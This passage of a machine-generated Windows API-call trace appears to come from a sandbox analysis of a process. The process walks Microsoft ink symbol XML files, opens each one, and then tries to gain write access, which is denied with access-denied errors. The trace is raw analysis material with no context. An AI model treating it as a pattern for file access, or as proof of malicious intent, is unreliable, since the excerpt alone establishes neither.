Size=0xa8) returned 0x5fe78 [0083.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x5fe78, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 84 [0083.949] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0083.949] GetFileType (hFile=0x428) returned 0x1 [0083.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0083.949] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.949] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.950] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.950] CloseHandle (hObject=0x428) returned 1 [0083.950] AreFileApisANSI () returned 1 [0083.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0083.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5f428 [0083.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 84 [0083.950] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.950] GetLastError () returned 0x5 [0083.950] GetLastError () returned 0x5 [0083.950] SetLastError (dwErrCode=0x5) [0083.950] GetLastError () returned 0x5 [0083.950] SetLastError (dwErrCode=0x5) [0083.950] GetLastError () returned 0x5 [0083.950] SetLastError (dwErrCode=0x5) [0083.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0083.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0083.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.951] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x325, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ja-jp-sym.xml", cAlternateFileName="")) returned 1 [0083.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0083.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x51398 [0083.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81d68 [0083.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0083.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0083.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.951] AreFileApisANSI () returned 1 [0083.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpUsedDefaultChar=0x0) returned 87 [0083.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0083.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.952] AreFileApisANSI () returned 1 [0083.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0083.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81410 [0083.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x81410, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 87 [0083.952] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0083.952] GetFileType (hFile=0x428) returned 0x1 [0083.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81410 | out: hHeap=0x20000) returned 1 [0083.952] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.952] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.953] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.953] CloseHandle (hObject=0x428) returned 1 [0083.953] AreFileApisANSI () returned 1 [0083.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0083.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81580 [0083.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x81580, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 87 [0083.953] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.953] GetLastError () returned 0x5 [0083.953] GetLastError () returned 0x5 [0083.953] SetLastError (dwErrCode=0x5) [0083.953] GetLastError () returned 0x5 [0083.953] SetLastError (dwErrCode=0x5) [0083.953] GetLastError () returned 0x5 [0083.953] SetLastError (dwErrCode=0x5) [0083.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0083.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0083.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.954] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xeef, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="symbase.xml", cAlternateFileName="")) returned 1 [0083.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0083.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0083.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x51398 [0083.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81cb0 [0083.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0083.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0083.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.954] AreFileApisANSI () returned 1 [0083.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpUsedDefaultChar=0x0) returned 85 [0083.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0083.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.955] AreFileApisANSI () returned 1 [0083.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0083.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81cb0 [0083.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x81cb0, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 85 [0083.955] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0083.956] GetFileType (hFile=0x428) returned 0x1 [0083.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0083.956] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.956] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.956] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.956] CloseHandle (hObject=0x428) returned 1 [0083.957] AreFileApisANSI () returned 1 [0083.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0083.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81bf8 [0083.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x81bf8, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 85 [0083.957] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.957] GetLastError () returned 0x5 [0083.957] GetLastError () returned 0x5 [0083.957] SetLastError (dwErrCode=0x5) [0083.957] GetLastError () returned 0x5 [0083.957] SetLastError (dwErrCode=0x5) [0083.957] GetLastError () returned 0x5 [0083.957] SetLastError (dwErrCode=0x5) [0083.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0083.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0083.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.957] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0xa8, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x513a0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0xa8, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓໯")) returned 0 [0083.957] FindClose (in: hFindFile=0x784d0 | out: hFindFile=0x784d0) returned 1 [0083.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0083.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0083.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0083.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0083.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.958] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.958] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.958] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.958] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.958] AreFileApisANSI () returned 1 [0083.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml", lpUsedDefaultChar=0x0) returned 77 [0083.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0083.958] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.958] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.958] RtlAllocateHeap 